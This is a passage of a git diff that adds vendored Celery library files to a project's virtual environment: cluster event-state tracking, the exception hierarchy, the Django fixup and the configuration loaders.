None: + self.children = WeakSet( + self.cluster_state.tasks.get(task_id) + for task_id in children or () + if task_id in self.cluster_state.tasks + ) + else: + self.children = WeakSet() + self._serializer_handlers = { + 'children': self._serializable_children, + 'root': self._serializable_root, + 'parent': self._serializable_parent, + } + if kwargs: + self.__dict__.update(kwargs) + + def event(self, type_, timestamp=None, local_received=None, fields=None, + precedence=states.precedence, setattr=setattr, + task_event_to_state=TASK_EVENT_TO_STATE.get, RETRY=states.RETRY): + fields = fields or {} + + # using .get is faster than catching KeyError in this case. + state = task_event_to_state(type_) + if state is not None: + # sets, for example, self.succeeded to the timestamp. + setattr(self, type_, timestamp) + else: + state = type_.upper() # custom state + + # note that precedence here is reversed + # see implementation in celery.states.state.__lt__ + if state != RETRY and self.state != RETRY and \ + precedence(state) > precedence(self.state): + # this state logically happens-before the current state, so merge. + keep = self.merge_rules.get(state) + if keep is not None: + fields = { + k: v for k, v in fields.items() if k in keep + } + else: + fields.update(state=state, timestamp=timestamp) + + # update current state with info from this event. 
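+        # At this point `fields` is either the full payload of an in-order
+        # event (plus the new state and timestamp), or only the merge_rules
+        # subset of an out-of-order event, so newer info isn't overwritten.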
+ self.__dict__.update(fields) + + def info(self, fields=None, extra=None): + """Information about this task suitable for on-screen display.""" + extra = [] if not extra else extra + fields = self._info_fields if fields is None else fields + + def _keys(): + for key in list(fields) + list(extra): + value = getattr(self, key, None) + if value is not None: + yield key, value + + return dict(_keys()) + + def __repr__(self): + return R_TASK.format(self) + + def as_dict(self): + get = object.__getattribute__ + handler = self._serializer_handlers.get + return { + k: handler(k, pass1)(get(self, k)) for k in self._fields + } + + def _serializable_children(self, value): + return [task.id for task in self.children] + + def _serializable_root(self, value): + return self.root_id + + def _serializable_parent(self, value): + return self.parent_id + + def __reduce__(self): + return _depickle_task, (self.__class__, self.as_dict()) + + @property + def id(self): + return self.uuid + + @property + def origin(self): + return self.client if self.worker is None else self.worker.id + + @property + def ready(self): + return self.state in states.READY_STATES + + @cached_property + def parent(self): + # issue github.com/mher/flower/issues/648 + try: + return self.parent_id and self.cluster_state.tasks.data[self.parent_id] + except KeyError: + return None + + @cached_property + def root(self): + # issue github.com/mher/flower/issues/648 + try: + return self.root_id and self.cluster_state.tasks.data[self.root_id] + except KeyError: + return None + + +class State: + """Records clusters state.""" + + Worker = Worker + Task = Task + event_count = 0 + task_count = 0 + heap_multiplier = 4 + + def __init__(self, callback=None, + workers=None, tasks=None, taskheap=None, + max_workers_in_memory=5000, max_tasks_in_memory=10000, + on_node_join=None, on_node_leave=None, + tasks_by_type=None, tasks_by_worker=None): + self.event_callback = callback + self.workers = (LRUCache(max_workers_in_memory) + if workers is None else workers) + self.tasks = (LRUCache(max_tasks_in_memory) + if tasks is None else tasks) + self._taskheap = [] if taskheap is None else taskheap + self.max_workers_in_memory = max_workers_in_memory + self.max_tasks_in_memory = max_tasks_in_memory + self.on_node_join = on_node_join + self.on_node_leave = on_node_leave + self._mutex = threading.Lock() + self.handlers = {} + self._seen_types = set() + self._tasks_to_resolve = {} + self.rebuild_taskheap() + + self.tasks_by_type = CallableDefaultdict( + self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]] + self.tasks_by_type.update( + _deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks)) + + self.tasks_by_worker = CallableDefaultdict( + self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]] + self.tasks_by_worker.update( + _deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks)) + + @cached_property + def _event(self): + return self._create_dispatcher() + + def freeze_while(self, fun, *args, **kwargs): + clear_after = kwargs.pop('clear_after', False) + with self._mutex: + try: + return fun(*args, **kwargs) + finally: + if clear_after: + self._clear() + + def clear_tasks(self, ready=True): + with self._mutex: + return self._clear_tasks(ready) + + def _clear_tasks(self, ready: bool = True): + if ready: + in_progress = { + uuid: task for uuid, task in self.itertasks() + if task.state not in states.READY_STATES + } + self.tasks.clear() + self.tasks.update(in_progress) + else: + self.tasks.clear() + self._taskheap[:] = [] + + def 
_clear(self, ready=True): + self.workers.clear() + self._clear_tasks(ready) + self.event_count = 0 + self.task_count = 0 + + def clear(self, ready: bool = True): + with self._mutex: + return self._clear(ready) + + def get_or_create_worker(self, hostname, **kwargs): + """Get or create worker by hostname. + + Returns: + Tuple: of ``(worker, was_created)`` pairs. + """ + try: + worker = self.workers[hostname] + if kwargs: + worker.update(kwargs) + return worker, False + except KeyError: + worker = self.workers[hostname] = self.Worker( + hostname, **kwargs) + return worker, True + + def get_or_create_task(self, uuid): + """Get or create task by uuid.""" + try: + return self.tasks[uuid], False + except KeyError: + task = self.tasks[uuid] = self.Task(uuid, cluster_state=self) + return task, True + + def event(self, event): + with self._mutex: + return self._event(event) + + def task_event(self, type_, fields): + """Deprecated, use :meth:`event`.""" + return self._event(dict(fields, type='-'.join(['task', type_])))[0] + + def worker_event(self, type_, fields): + """Deprecated, use :meth:`event`.""" + return self._event(dict(fields, type='-'.join(['worker', type_])))[0] + + def _create_dispatcher(self): + + # pylint: disable=too-many-statements + # This code is highly optimized, but not for reusability. + get_handler = self.handlers.__getitem__ + event_callback = self.event_callback + wfields = itemgetter('hostname', 'timestamp', 'local_received') + tfields = itemgetter('uuid', 'hostname', 'timestamp', + 'local_received', 'clock') + taskheap = self._taskheap + th_append = taskheap.append + th_pop = taskheap.pop + # Removing events from task heap is an O(n) operation, + # so easier to just account for the common number of events + # for each task (PENDING->RECEIVED->STARTED->final) + #: an O(n) operation + max_events_in_heap = self.max_tasks_in_memory * self.heap_multiplier + add_type = self._seen_types.add + on_node_join, on_node_leave = self.on_node_join, self.on_node_leave + tasks, Task = self.tasks, self.Task + workers, Worker = self.workers, self.Worker + # avoid updating LRU entry at getitem + get_worker, get_task = workers.data.__getitem__, tasks.data.__getitem__ + + get_task_by_type_set = self.tasks_by_type.__getitem__ + get_task_by_worker_set = self.tasks_by_worker.__getitem__ + + def _event(event, + timetuple=timetuple, KeyError=KeyError, + insort=bisect.insort, created=True): + self.event_count += 1 + if event_callback: + event_callback(self, event) + group, _, subject = event['type'].partition('-') + try: + handler = get_handler(group) + except KeyError: + pass + else: + return handler(subject, event), subject + + if group == 'worker': + try: + hostname, timestamp, local_received = wfields(event) + except KeyError: + pass + else: + is_offline = subject == 'offline' + try: + worker, created = get_worker(hostname), False + except KeyError: + if is_offline: + worker, created = Worker(hostname), False + else: + worker = workers[hostname] = Worker(hostname) + worker.event(subject, timestamp, local_received, event) + if on_node_join and (created or subject == 'online'): + on_node_join(worker) + if on_node_leave and is_offline: + on_node_leave(worker) + workers.pop(hostname, None) + return (worker, created), subject + elif group == 'task': + (uuid, hostname, timestamp, + local_received, clock) = tfields(event) + # task-sent event is sent by client, not worker + is_client_event = subject == 'sent' + try: + task, task_created = get_task(uuid), False + except KeyError: + task = tasks[uuid] = 
Task(uuid, cluster_state=self) + task_created = True + if is_client_event: + task.client = hostname + else: + try: + worker = get_worker(hostname) + except KeyError: + worker = workers[hostname] = Worker(hostname) + task.worker = worker + if worker is not None and local_received: + worker.event(None, local_received, timestamp) + + origin = hostname if is_client_event else worker.id + + # remove oldest event if exceeding the limit. + heaps = len(taskheap) + if heaps + 1 > max_events_in_heap: + th_pop(0) + + # most events will be dated later than the previous. + timetup = timetuple(clock, timestamp, origin, ref(task)) + if heaps and timetup > taskheap[-1]: + th_append(timetup) + else: + insort(taskheap, timetup) + + if subject == 'received': + self.task_count += 1 + task.event(subject, timestamp, local_received, event) + task_name = task.name + if task_name is not None: + add_type(task_name) + if task_created: # add to tasks_by_type index + get_task_by_type_set(task_name).add(task) + get_task_by_worker_set(hostname).add(task) + if task.parent_id: + try: + parent_task = self.tasks[task.parent_id] + except KeyError: + self._add_pending_task_child(task) + else: + parent_task.children.add(task) + try: + _children = self._tasks_to_resolve.pop(uuid) + except KeyError: + pass + else: + task.children.update(_children) + + return (task, task_created), subject + return _event + + def _add_pending_task_child(self, task): + try: + ch = self._tasks_to_resolve[task.parent_id] + except KeyError: + ch = self._tasks_to_resolve[task.parent_id] = WeakSet() + ch.add(task) + + def rebuild_taskheap(self, timetuple=timetuple): + heap = self._taskheap[:] = [ + timetuple(t.clock, t.timestamp, t.origin, ref(t)) + for t in self.tasks.values() + ] + heap.sort() + + def itertasks(self, limit: Optional[int] = None): + for index, row in enumerate(self.tasks.items()): + yield row + if limit and index + 1 >= limit: + break + + def tasks_by_time(self, limit=None, reverse: bool = True): + """Generator yielding tasks ordered by time. + + Yields: + Tuples of ``(uuid, Task)``. + """ + _heap = self._taskheap + if reverse: + _heap = reversed(_heap) + + seen = set() + for evtup in islice(_heap, 0, limit): + task = evtup[3]() + if task is not None: + uuid = task.uuid + if uuid not in seen: + yield uuid, task + seen.add(uuid) + tasks_by_timestamp = tasks_by_time + + def _tasks_by_type(self, name, limit=None, reverse=True): + """Get all tasks by type. + + This is slower than accessing :attr:`tasks_by_type`, + but will be ordered by time. + + Returns: + Generator: giving ``(uuid, Task)`` pairs. + """ + return islice( + ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) + if task.name == name), + 0, limit, + ) + + def _tasks_by_worker(self, hostname, limit=None, reverse=True): + """Get all tasks by worker. + + Slower than accessing :attr:`tasks_by_worker`, but ordered by time. 
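+
+        Example (hypothetical worker hostname)::
+
+            >>> recent = list(state.tasks_by_worker('celery@worker1', limit=10))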
+ """ + return islice( + ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) + if task.worker.hostname == hostname), + 0, limit, + ) + + def task_types(self): + """Return a list of all seen task types.""" + return sorted(self._seen_types) + + def alive_workers(self): + """Return a list of (seemingly) alive workers.""" + return (w for w in self.workers.values() if w.alive) + + def __repr__(self): + return R_STATE.format(self) + + def __reduce__(self): + return self.__class__, ( + self.event_callback, self.workers, self.tasks, None, + self.max_workers_in_memory, self.max_tasks_in_memory, + self.on_node_join, self.on_node_leave, + _serialize_Task_WeakSet_Mapping(self.tasks_by_type), + _serialize_Task_WeakSet_Mapping(self.tasks_by_worker), + ) + + +def _serialize_Task_WeakSet_Mapping(mapping): + return {name: [t.id for t in tasks] for name, tasks in mapping.items()} + + +def _deserialize_Task_WeakSet_Mapping(mapping, tasks): + mapping = mapping or {} + return {name: WeakSet(tasks[i] for i in ids if i in tasks) + for name, ids in mapping.items()} diff --git a/env/Lib/site-packages/celery/exceptions.py b/env/Lib/site-packages/celery/exceptions.py new file mode 100644 index 00000000..3203e9f4 --- /dev/null +++ b/env/Lib/site-packages/celery/exceptions.py @@ -0,0 +1,312 @@ +"""Celery error types. + +Error Hierarchy +=============== + +- :exc:`Exception` + - :exc:`celery.exceptions.CeleryError` + - :exc:`~celery.exceptions.ImproperlyConfigured` + - :exc:`~celery.exceptions.SecurityError` + - :exc:`~celery.exceptions.TaskPredicate` + - :exc:`~celery.exceptions.Ignore` + - :exc:`~celery.exceptions.Reject` + - :exc:`~celery.exceptions.Retry` + - :exc:`~celery.exceptions.TaskError` + - :exc:`~celery.exceptions.QueueNotFound` + - :exc:`~celery.exceptions.IncompleteStream` + - :exc:`~celery.exceptions.NotRegistered` + - :exc:`~celery.exceptions.AlreadyRegistered` + - :exc:`~celery.exceptions.TimeoutError` + - :exc:`~celery.exceptions.MaxRetriesExceededError` + - :exc:`~celery.exceptions.TaskRevokedError` + - :exc:`~celery.exceptions.InvalidTaskError` + - :exc:`~celery.exceptions.ChordError` + - :exc:`~celery.exceptions.BackendError` + - :exc:`~celery.exceptions.BackendGetMetaError` + - :exc:`~celery.exceptions.BackendStoreError` + - :class:`kombu.exceptions.KombuError` + - :exc:`~celery.exceptions.OperationalError` + + Raised when a transport connection error occurs while + sending a message (be it a task, remote control command error). + + .. note:: + This exception does not inherit from + :exc:`~celery.exceptions.CeleryError`. 
+ - **billiard errors** (prefork pool) + - :exc:`~celery.exceptions.SoftTimeLimitExceeded` + - :exc:`~celery.exceptions.TimeLimitExceeded` + - :exc:`~celery.exceptions.WorkerLostError` + - :exc:`~celery.exceptions.Terminated` +- :class:`UserWarning` + - :class:`~celery.exceptions.CeleryWarning` + - :class:`~celery.exceptions.AlwaysEagerIgnored` + - :class:`~celery.exceptions.DuplicateNodenameWarning` + - :class:`~celery.exceptions.FixupWarning` + - :class:`~celery.exceptions.NotConfigured` + - :class:`~celery.exceptions.SecurityWarning` +- :exc:`BaseException` + - :exc:`SystemExit` + - :exc:`~celery.exceptions.WorkerTerminate` + - :exc:`~celery.exceptions.WorkerShutdown` +""" + +import numbers + +from billiard.exceptions import SoftTimeLimitExceeded, Terminated, TimeLimitExceeded, WorkerLostError +from click import ClickException +from kombu.exceptions import OperationalError + +__all__ = ( + 'reraise', + # Warnings + 'CeleryWarning', + 'AlwaysEagerIgnored', 'DuplicateNodenameWarning', + 'FixupWarning', 'NotConfigured', 'SecurityWarning', + + # Core errors + 'CeleryError', + 'ImproperlyConfigured', 'SecurityError', + + # Kombu (messaging) errors. + 'OperationalError', + + # Task semi-predicates + 'TaskPredicate', 'Ignore', 'Reject', 'Retry', + + # Task related errors. + 'TaskError', 'QueueNotFound', 'IncompleteStream', + 'NotRegistered', 'AlreadyRegistered', 'TimeoutError', + 'MaxRetriesExceededError', 'TaskRevokedError', + 'InvalidTaskError', 'ChordError', + + # Backend related errors. + 'BackendError', 'BackendGetMetaError', 'BackendStoreError', + + # Billiard task errors. + 'SoftTimeLimitExceeded', 'TimeLimitExceeded', + 'WorkerLostError', 'Terminated', + + # Deprecation warnings (forcing Python to emit them). + 'CPendingDeprecationWarning', 'CDeprecationWarning', + + # Worker shutdown semi-predicates (inherits from SystemExit). + 'WorkerShutdown', 'WorkerTerminate', + + 'CeleryCommandException', +) + +from celery.utils.serialization import get_pickleable_exception + +UNREGISTERED_FMT = """\ +Task of kind {0} never registered, please make sure it's imported.\ +""" + + +def reraise(tp, value, tb=None): + """Reraise exception.""" + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + + +class CeleryWarning(UserWarning): + """Base class for all Celery warnings.""" + + +class AlwaysEagerIgnored(CeleryWarning): + """send_task ignores :setting:`task_always_eager` option.""" + + +class DuplicateNodenameWarning(CeleryWarning): + """Multiple workers are using the same nodename.""" + + +class FixupWarning(CeleryWarning): + """Fixup related warning.""" + + +class NotConfigured(CeleryWarning): + """Celery hasn't been configured, as no config module has been found.""" + + +class SecurityWarning(CeleryWarning): + """Potential security issue found.""" + + +class CeleryError(Exception): + """Base class for all Celery errors.""" + + +class TaskPredicate(CeleryError): + """Base class for task-related semi-predicates.""" + + +class Retry(TaskPredicate): + """The task is to be retried later.""" + + #: Optional message describing context of retry. + message = None + + #: Exception (if any) that caused the retry to happen. + exc = None + + #: Time of retry (ETA), either :class:`numbers.Real` or + #: :class:`~datetime.datetime`. 
+ when = None + + def __init__(self, message=None, exc=None, when=None, is_eager=False, + sig=None, **kwargs): + from kombu.utils.encoding import safe_repr + self.message = message + if isinstance(exc, str): + self.exc, self.excs = None, exc + else: + self.exc, self.excs = get_pickleable_exception(exc), safe_repr(exc) if exc else None + self.when = when + self.is_eager = is_eager + self.sig = sig + super().__init__(self, exc, when, **kwargs) + + def humanize(self): + if isinstance(self.when, numbers.Number): + return f'in {self.when}s' + return f'at {self.when}' + + def __str__(self): + if self.message: + return self.message + if self.excs: + return f'Retry {self.humanize()}: {self.excs}' + return f'Retry {self.humanize()}' + + def __reduce__(self): + return self.__class__, (self.message, self.exc, self.when) + + +RetryTaskError = Retry # XXX compat + + +class Ignore(TaskPredicate): + """A task can raise this to ignore doing state updates.""" + + +class Reject(TaskPredicate): + """A task can raise this if it wants to reject/re-queue the message.""" + + def __init__(self, reason=None, requeue=False): + self.reason = reason + self.requeue = requeue + super().__init__(reason, requeue) + + def __repr__(self): + return f'reject requeue={self.requeue}: {self.reason}' + + +class ImproperlyConfigured(CeleryError): + """Celery is somehow improperly configured.""" + + +class SecurityError(CeleryError): + """Security related exception.""" + + +class TaskError(CeleryError): + """Task related errors.""" + + +class QueueNotFound(KeyError, TaskError): + """Task routed to a queue not in ``conf.queues``.""" + + +class IncompleteStream(TaskError): + """Found the end of a stream of data, but the data isn't complete.""" + + +class NotRegistered(KeyError, TaskError): + """The task is not registered.""" + + def __repr__(self): + return UNREGISTERED_FMT.format(self) + + +class AlreadyRegistered(TaskError): + """The task is already registered.""" + # XXX Unused + + +class TimeoutError(TaskError): + """The operation timed out.""" + + +class MaxRetriesExceededError(TaskError): + """The tasks max restart limit has been exceeded.""" + + def __init__(self, *args, **kwargs): + self.task_args = kwargs.pop("task_args", []) + self.task_kwargs = kwargs.pop("task_kwargs", dict()) + super().__init__(*args, **kwargs) + + +class TaskRevokedError(TaskError): + """The task has been revoked, so no result available.""" + + +class InvalidTaskError(TaskError): + """The task has invalid data or ain't properly constructed.""" + + +class ChordError(TaskError): + """A task part of the chord raised an exception.""" + + +class CPendingDeprecationWarning(PendingDeprecationWarning): + """Warning of pending deprecation.""" + + +class CDeprecationWarning(DeprecationWarning): + """Warning of deprecation.""" + + +class WorkerTerminate(SystemExit): + """Signals that the worker should terminate immediately.""" + + +SystemTerminate = WorkerTerminate # XXX compat + + +class WorkerShutdown(SystemExit): + """Signals that the worker should perform a warm shutdown.""" + + +class BackendError(Exception): + """An issue writing or reading to/from the backend.""" + + +class BackendGetMetaError(BackendError): + """An issue reading from the backend.""" + + def __init__(self, *args, **kwargs): + self.task_id = kwargs.get('task_id', "") + + def __repr__(self): + return super().__repr__() + " task_id:" + self.task_id + + +class BackendStoreError(BackendError): + """An issue writing to the backend.""" + + def __init__(self, *args, **kwargs): + self.state = 
kwargs.get('state', "") + self.task_id = kwargs.get('task_id', "") + + def __repr__(self): + return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id + + +class CeleryCommandException(ClickException): + """A general command exception which stores an exit code.""" + + def __init__(self, message, exit_code): + super().__init__(message=message) + self.exit_code = exit_code diff --git a/env/Lib/site-packages/celery/fixups/__init__.py b/env/Lib/site-packages/celery/fixups/__init__.py new file mode 100644 index 00000000..c565ca34 --- /dev/null +++ b/env/Lib/site-packages/celery/fixups/__init__.py @@ -0,0 +1 @@ +"""Fixups.""" diff --git a/env/Lib/site-packages/celery/fixups/django.py b/env/Lib/site-packages/celery/fixups/django.py new file mode 100644 index 00000000..473c3b67 --- /dev/null +++ b/env/Lib/site-packages/celery/fixups/django.py @@ -0,0 +1,213 @@ +"""Django-specific customization.""" +import os +import sys +import warnings +from datetime import datetime +from importlib import import_module +from typing import IO, TYPE_CHECKING, Any, List, Optional, cast + +from kombu.utils.imports import symbol_by_name +from kombu.utils.objects import cached_property + +from celery import _state, signals +from celery.exceptions import FixupWarning, ImproperlyConfigured + +if TYPE_CHECKING: + from types import ModuleType + from typing import Protocol + + from django.db.utils import ConnectionHandler + + from celery.app.base import Celery + from celery.app.task import Task + + class DjangoDBModule(Protocol): + connections: ConnectionHandler + + +__all__ = ('DjangoFixup', 'fixup') + +ERR_NOT_INSTALLED = """\ +Environment variable DJANGO_SETTINGS_MODULE is defined +but Django isn't installed. Won't apply Django fix-ups! +""" + + +def _maybe_close_fd(fh: IO) -> None: + try: + os.close(fh.fileno()) + except (AttributeError, OSError, TypeError): + # TypeError added for celery#962 + pass + + +def _verify_django_version(django: "ModuleType") -> None: + if django.VERSION < (1, 11): + raise ImproperlyConfigured('Celery 5.x requires Django 1.11 or later.') + + +def fixup(app: "Celery", env: str = 'DJANGO_SETTINGS_MODULE') -> Optional["DjangoFixup"]: + """Install Django fixup if settings module environment is set.""" + SETTINGS_MODULE = os.environ.get(env) + if SETTINGS_MODULE and 'django' not in app.loader_cls.lower(): + try: + import django + except ImportError: + warnings.warn(FixupWarning(ERR_NOT_INSTALLED)) + else: + _verify_django_version(django) + return DjangoFixup(app).install() + return None + + +class DjangoFixup: + """Fixup installed when using Django.""" + + def __init__(self, app: "Celery"): + self.app = app + if _state.default_app is None: + self.app.set_default() + self._worker_fixup: Optional["DjangoWorkerFixup"] = None + + def install(self) -> "DjangoFixup": + # Need to add project directory to path. + # The project directory has precedence over system modules, + # so we prepend it to the path. 
+ sys.path.insert(0, os.getcwd()) + + self._settings = symbol_by_name('django.conf:settings') + self.app.loader.now = self.now + + signals.import_modules.connect(self.on_import_modules) + signals.worker_init.connect(self.on_worker_init) + return self + + @property + def worker_fixup(self) -> "DjangoWorkerFixup": + if self._worker_fixup is None: + self._worker_fixup = DjangoWorkerFixup(self.app) + return self._worker_fixup + + @worker_fixup.setter + def worker_fixup(self, value: "DjangoWorkerFixup") -> None: + self._worker_fixup = value + + def on_import_modules(self, **kwargs: Any) -> None: + # call django.setup() before task modules are imported + self.worker_fixup.validate_models() + + def on_worker_init(self, **kwargs: Any) -> None: + self.worker_fixup.install() + + def now(self, utc: bool = False) -> datetime: + return datetime.utcnow() if utc else self._now() + + def autodiscover_tasks(self) -> List[str]: + from django.apps import apps + return [config.name for config in apps.get_app_configs()] + + @cached_property + def _now(self) -> datetime: + return symbol_by_name('django.utils.timezone:now') + + +class DjangoWorkerFixup: + _db_recycles = 0 + + def __init__(self, app: "Celery") -> None: + self.app = app + self.db_reuse_max = self.app.conf.get('CELERY_DB_REUSE_MAX', None) + self._db = cast("DjangoDBModule", import_module('django.db')) + self._cache = import_module('django.core.cache') + self._settings = symbol_by_name('django.conf:settings') + + self.interface_errors = ( + symbol_by_name('django.db.utils.InterfaceError'), + ) + self.DatabaseError = symbol_by_name('django.db:DatabaseError') + + def django_setup(self) -> None: + import django + django.setup() + + def validate_models(self) -> None: + from django.core.checks import run_checks + self.django_setup() + if not os.environ.get('CELERY_SKIP_CHECKS'): + run_checks() + + def install(self) -> "DjangoWorkerFixup": + signals.beat_embedded_init.connect(self.close_database) + signals.task_prerun.connect(self.on_task_prerun) + signals.task_postrun.connect(self.on_task_postrun) + signals.worker_process_init.connect(self.on_worker_process_init) + self.close_database() + self.close_cache() + return self + + def on_worker_process_init(self, **kwargs: Any) -> None: + # Child process must validate models again if on Windows, + # or if they were started using execv. + if os.environ.get('FORKED_BY_MULTIPROCESSING'): + self.validate_models() + + # close connections: + # the parent process may have established these, + # so need to close them. + + # calling db.close() on some DB connections will cause + # the inherited DB conn to also get broken in the parent + # process so we need to remove it without triggering any + # network IO that close() might cause. 
+ for c in self._db.connections.all(): + if c and c.connection: + self._maybe_close_db_fd(c.connection) + + # use the _ version to avoid DB_REUSE preventing the conn.close() call + self._close_database(force=True) + self.close_cache() + + def _maybe_close_db_fd(self, fd: IO) -> None: + try: + _maybe_close_fd(fd) + except self.interface_errors: + pass + + def on_task_prerun(self, sender: "Task", **kwargs: Any) -> None: + """Called before every task.""" + if not getattr(sender.request, 'is_eager', False): + self.close_database() + + def on_task_postrun(self, sender: "Task", **kwargs: Any) -> None: + # See https://groups.google.com/group/django-users/browse_thread/thread/78200863d0c07c6d/ + if not getattr(sender.request, 'is_eager', False): + self.close_database() + self.close_cache() + + def close_database(self, **kwargs: Any) -> None: + if not self.db_reuse_max: + return self._close_database() + if self._db_recycles >= self.db_reuse_max * 2: + self._db_recycles = 0 + self._close_database() + self._db_recycles += 1 + + def _close_database(self, force: bool = False) -> None: + for conn in self._db.connections.all(): + try: + if force: + conn.close() + else: + conn.close_if_unusable_or_obsolete() + except self.interface_errors: + pass + except self.DatabaseError as exc: + str_exc = str(exc) + if 'closed' not in str_exc and 'not connected' not in str_exc: + raise + + def close_cache(self) -> None: + try: + self._cache.close_caches() + except (TypeError, AttributeError): + pass diff --git a/env/Lib/site-packages/celery/loaders/__init__.py b/env/Lib/site-packages/celery/loaders/__init__.py new file mode 100644 index 00000000..730a1fa2 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/__init__.py @@ -0,0 +1,18 @@ +"""Get loader by name. + +Loaders define how configuration is read, what happens +when workers start, when tasks are executed and so on. +""" +from celery.utils.imports import import_from_cwd, symbol_by_name + +__all__ = ('get_loader_cls',) + +LOADER_ALIASES = { + 'app': 'celery.loaders.app:AppLoader', + 'default': 'celery.loaders.default:Loader', +} + + +def get_loader_cls(loader): + """Get loader class by name/alias.""" + return symbol_by_name(loader, LOADER_ALIASES, imp=import_from_cwd) diff --git a/env/Lib/site-packages/celery/loaders/app.py b/env/Lib/site-packages/celery/loaders/app.py new file mode 100644 index 00000000..c9784c50 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/app.py @@ -0,0 +1,8 @@ +"""The default loader used with custom app instances.""" +from .base import BaseLoader + +__all__ = ('AppLoader',) + + +class AppLoader(BaseLoader): + """Default loader used when an app is specified.""" diff --git a/env/Lib/site-packages/celery/loaders/base.py b/env/Lib/site-packages/celery/loaders/base.py new file mode 100644 index 00000000..aa7139c7 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/base.py @@ -0,0 +1,272 @@ +"""Loader base class.""" +import importlib +import os +import re +import sys +from datetime import datetime + +from kombu.utils import json +from kombu.utils.objects import cached_property + +from celery import signals +from celery.exceptions import reraise +from celery.utils.collections import DictAttribute, force_mapping +from celery.utils.functional import maybe_list +from celery.utils.imports import NotAPackage, find_module, import_from_cwd, symbol_by_name + +__all__ = ('BaseLoader',) + +_RACE_PROTECTION = False + +CONFIG_INVALID_NAME = """\ +Error: Module '{module}' doesn't exist, or it's not a valid \ +Python module name. 
+""" + +CONFIG_WITH_SUFFIX = CONFIG_INVALID_NAME + """\ +Did you mean '{suggest}'? +""" + +unconfigured = object() + + +class BaseLoader: + """Base class for loaders. + + Loaders handles, + + * Reading celery client/worker configurations. + + * What happens when a task starts? + See :meth:`on_task_init`. + + * What happens when the worker starts? + See :meth:`on_worker_init`. + + * What happens when the worker shuts down? + See :meth:`on_worker_shutdown`. + + * What modules are imported to find tasks? + """ + + builtin_modules = frozenset() + configured = False + override_backends = {} + worker_initialized = False + + _conf = unconfigured + + def __init__(self, app, **kwargs): + self.app = app + self.task_modules = set() + + def now(self, utc=True): + if utc: + return datetime.utcnow() + return datetime.now() + + def on_task_init(self, task_id, task): + """Called before a task is executed.""" + + def on_process_cleanup(self): + """Called after a task is executed.""" + + def on_worker_init(self): + """Called when the worker (:program:`celery worker`) starts.""" + + def on_worker_shutdown(self): + """Called when the worker (:program:`celery worker`) shuts down.""" + + def on_worker_process_init(self): + """Called when a child process starts.""" + + def import_task_module(self, module): + self.task_modules.add(module) + return self.import_from_cwd(module) + + def import_module(self, module, package=None): + return importlib.import_module(module, package=package) + + def import_from_cwd(self, module, imp=None, package=None): + return import_from_cwd( + module, + self.import_module if imp is None else imp, + package=package, + ) + + def import_default_modules(self): + responses = signals.import_modules.send(sender=self.app) + # Prior to this point loggers are not yet set up properly, need to + # check responses manually and reraised exceptions if any, otherwise + # they'll be silenced, making it incredibly difficult to debug. + for _, response in responses: + if isinstance(response, Exception): + raise response + return [self.import_task_module(m) for m in self.default_modules] + + def init_worker(self): + if not self.worker_initialized: + self.worker_initialized = True + self.import_default_modules() + self.on_worker_init() + + def shutdown_worker(self): + self.on_worker_shutdown() + + def init_worker_process(self): + self.on_worker_process_init() + + def config_from_object(self, obj, silent=False): + if isinstance(obj, str): + try: + obj = self._smart_import(obj, imp=self.import_from_cwd) + except (ImportError, AttributeError): + if silent: + return False + raise + self._conf = force_mapping(obj) + if self._conf.get('override_backends') is not None: + self.override_backends = self._conf['override_backends'] + return True + + def _smart_import(self, path, imp=None): + imp = self.import_module if imp is None else imp + if ':' in path: + # Path includes attribute so can just jump + # here (e.g., ``os.path:abspath``). + return symbol_by_name(path, imp=imp) + + # Not sure if path is just a module name or if it includes an + # attribute name (e.g., ``os.path``, vs, ``os.path.abspath``). + try: + return imp(path) + except ImportError: + # Not a module name, so try module + attribute. 
+ return symbol_by_name(path, imp=imp) + + def _import_config_module(self, name): + try: + self.find_module(name) + except NotAPackage as exc: + if name.endswith('.py'): + reraise(NotAPackage, NotAPackage(CONFIG_WITH_SUFFIX.format( + module=name, suggest=name[:-3])), sys.exc_info()[2]) + raise NotAPackage(CONFIG_INVALID_NAME.format(module=name)) from exc + else: + return self.import_from_cwd(name) + + def find_module(self, module): + return find_module(module) + + def cmdline_config_parser(self, args, namespace='celery', + re_type=re.compile(r'\((\w+)\)'), + extra_types=None, + override_types=None): + extra_types = extra_types if extra_types else {'json': json.loads} + override_types = override_types if override_types else { + 'tuple': 'json', + 'list': 'json', + 'dict': 'json' + } + from celery.app.defaults import NAMESPACES, Option + namespace = namespace and namespace.lower() + typemap = dict(Option.typemap, **extra_types) + + def getarg(arg): + """Parse single configuration from command-line.""" + # ## find key/value + # ns.key=value|ns_key=value (case insensitive) + key, value = arg.split('=', 1) + key = key.lower().replace('.', '_') + + # ## find name-space. + # .key=value|_key=value expands to default name-space. + if key[0] == '_': + ns, key = namespace, key[1:] + else: + # find name-space part of key + ns, key = key.split('_', 1) + + ns_key = (ns and ns + '_' or '') + key + + # (type)value makes cast to custom type. + cast = re_type.match(value) + if cast: + type_ = cast.groups()[0] + type_ = override_types.get(type_, type_) + value = value[len(cast.group()):] + value = typemap[type_](value) + else: + try: + value = NAMESPACES[ns.lower()][key].to_python(value) + except ValueError as exc: + # display key name in error message. + raise ValueError(f'{ns_key!r}: {exc}') + return ns_key, value + return dict(getarg(arg) for arg in args) + + def read_configuration(self, env='CELERY_CONFIG_MODULE'): + try: + custom_config = os.environ[env] + except KeyError: + pass + else: + if custom_config: + usercfg = self._import_config_module(custom_config) + return DictAttribute(usercfg) + + def autodiscover_tasks(self, packages, related_name='tasks'): + self.task_modules.update( + mod.__name__ for mod in autodiscover_tasks(packages or (), + related_name) if mod) + + @cached_property + def default_modules(self): + return ( + tuple(self.builtin_modules) + + tuple(maybe_list(self.app.conf.imports)) + + tuple(maybe_list(self.app.conf.include)) + ) + + @property + def conf(self): + """Loader configuration.""" + if self._conf is unconfigured: + self._conf = self.read_configuration() + return self._conf 